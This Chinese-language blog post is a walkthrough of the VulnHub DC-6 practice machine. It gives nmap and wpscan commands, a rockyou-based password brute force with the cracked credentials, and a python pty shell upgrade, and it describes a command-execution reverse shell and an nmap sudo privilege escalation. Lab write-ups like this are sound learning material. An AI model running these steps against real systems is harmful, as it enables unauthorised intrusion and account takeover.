white0123

永远保持第一天接触网络安全的热情

首页 归档 标签 关于

vulnhub DC-6 靶机

2023-03-08 2 min read # vulnhub

DC - 6 靶机

前言:

为什么直接到DC 6 了呢? 因为DC -5 最后一步提权那里一直还没有做好。看了下 DC 6感觉这个简单点。

攻击机 : kali 192.168.56.132

受害机 : DC -6 192.168.56.147

过关条件:入侵靶机提权到root权限得到flag。

内网信息探测
arp-scan -l
nmap -A -p1-65535 -T4 192.168.56.147
image-20230308193129882

得到靶机的地址以及开放端口。

访问靶机地址,发现无法访问。首先想到需要修改本地host文件,操作与DC 2 类似

添加

192.168.56.147   wordy

可以正常访问。

image-20230308193406911

直接访问后台登录口

image-20230308193505803
暴力破解

使用wpscan 枚举用户名

wpscan --url wordy -e user.txt

用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破

#先解压密码字典
gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt

#用户名和密码字典都有了,开始爆破
wpscan --url wordy -U user.txt -P pwd.txt   //数据很多,直接看结果吧
#爆破出来账号:mark 密码:helpdesk01
在这里插入图片描述
任意命令执行

登录进后台,到处点发现在 Activity monitor 存在 任意命令执行漏洞。

image-20230308193940618
image-20230308193952439
反弹shell

burp抓包 修改请求包 使用nc反弹shell

image-20230308194109587

不是完整的shell环境使用python的pty模块

python -c "import pty;pty.spawn('/bin/bash')"
image-20230308194210099

成功获取到shell环境。

image-20230308194452920

通过移动到其他账号查看 sudo提权 通过 namp成功提权得到flag。

总结

这个靶机的任意命令执行那里的发现比较麻烦,还有就是反弹shell的编写。提权思路也挺骚的。需要下来多尝试并理解。

RSS